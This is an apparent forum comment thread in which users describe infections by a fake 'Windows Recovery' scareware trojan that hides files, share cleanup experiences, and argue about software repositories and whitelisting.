From the varients I have seen it doesn't move the files it simply marks all files and folders as hidden. Some have only effected the user's profile while others the whole drive. Also dumb programs like "unhide" that run to make correcting this simpler also make Local Settings and Application Data (XP) as visible rather than hidden so they don't really put things back correctly and you could probably do the same thing at the root of the file system recursively at the command line.

It's prolific - not just for IE.

It's prolific - not just for IE. I have seen 4 inflections since about Mar-30 - I would not call this a new malware but an update of the old WindowRecovery / WindowsRepair trojan strain. The thing that really sucks is, I am carefully-anti-clicky but this effin thing still got through, and I don't really know how. infection#1 on Windows7 fully patched, MSE AV with Firefox+noscript, while browsing NON-porn forums on what, flashlights - went to freakin-blue-screen! Infection#2 on a corporate Windows-XP (supposedly patched, TrendMicro AV with IE8, while browsing forums on tablets. Infection#3 on a typical idiot coworker's personal notebook, windows7 with nothing. Infection#4 on the same #1-machine-cleaned-up, but this time on browsing porn. Not much in common denominators. The only saving grace is that it was not destructive yet. But it stopped TaskMgr, System-Recovery and it was a significant pain in the ass until I worked out a standard method of cleaning - now I keep the tools on a keychain drive all the time. It won't be the last time it shows up, and I'm concerned that a new strain will be destructive.

FYI If you get this infection then directions at www.bleepingcomputer.com are useful.

They dont have a repository?

[nurb432]

What is this then? http://www.microsoft.com/web/downloads/platform.aspx I used it just this week to install sql express...

And i'm not a fan of Microsoft either, but lets not use lies to attack them with.

Re:They dont have a repository?

[Attila+Dimedici]

What is this then? http://www.microsoft.com/web/downloads/platform.aspx I used it just this week to install sql express...

And i'm not a fan of Microsoft either, but lets not use lies to attack them with.

That would be a place to get some Microsoft software, but I did not see any games, money management software, book inventory software, video inventory software, etc. So, it is not quite the same. If you can think of using a PC to do a task, there is probably software in the repository of a given Linux distro to do it (not necessarily very good software, but nevertheless, something).

Re:They dont have a repository?

[nurb432]

I agree its *limited*, but saying they don't have one at all is somewhat dishonest.

Re:They dont have a repository?

[Attila+Dimedici]

Have you ever used a Linux distro? Have you ever seen what their repositories look like?
I use Windows much more than I use Linux because there is software I use that does not have counterparts on Linux. I don't dislike Windows. The "repository" you pointed out has nothing that an ordinary user would use.

We need whitelisting.

[Zaphod-AVA]

Until the security industry switches from blacklisting to whitelisting, the malware industry will thrive.

We need a centrally managed service people subscribe to that will automatically adds programs from known legitimate vendors and their updates so that the whitelist only blocks unusual executables.

Re:We need whitelisting.

Sounds like the App Store.

Do you *really* want that?

This happened to me.

I had this happen a couple of months ago, but I think it was called "Windows Repair", not Recovery. It fouled up everything and hid my files, and I couldn't do anything, including shut down the computer. I unplugged it, and signed in to a different user account. Got Malwarebytes to remove the malware, and found info online on how to unhide folders of apparently missing files. No way would I pay money for a message on my screen. That is the number one way to know it is not legit or coming from your own computer system. I've got Windows 7 and have since gotten WinPatrol and AdMuncher, and I think those two programs are going to be very helpful in preventing at least some problems.

Where's our government?

Isn't our government supposed to protect us from crime? Hey, how about shoving some bullets in the brains of these virus creators instead of shoving individual mandates up our asses?

Hidden file attribute variation...

I came across something similar, where the malware simply turned on the hidden file attribute on everything on the hard drive. Windows would boot, but none of the program links could be found. Fixing it turned out to be a real pain in the butt, because the software was some sort of rootkit, but at least none of the files were lost--which was what the user had assumed when the hard drive appeared empty. Rooted it out with combofix and then unhid the files. I was stymied for a bit over what was going on. Really irritating.

Fighting Back

Why can't State's Attorney Generals go after Visa and Mastercard for cooperating with the Malware fims?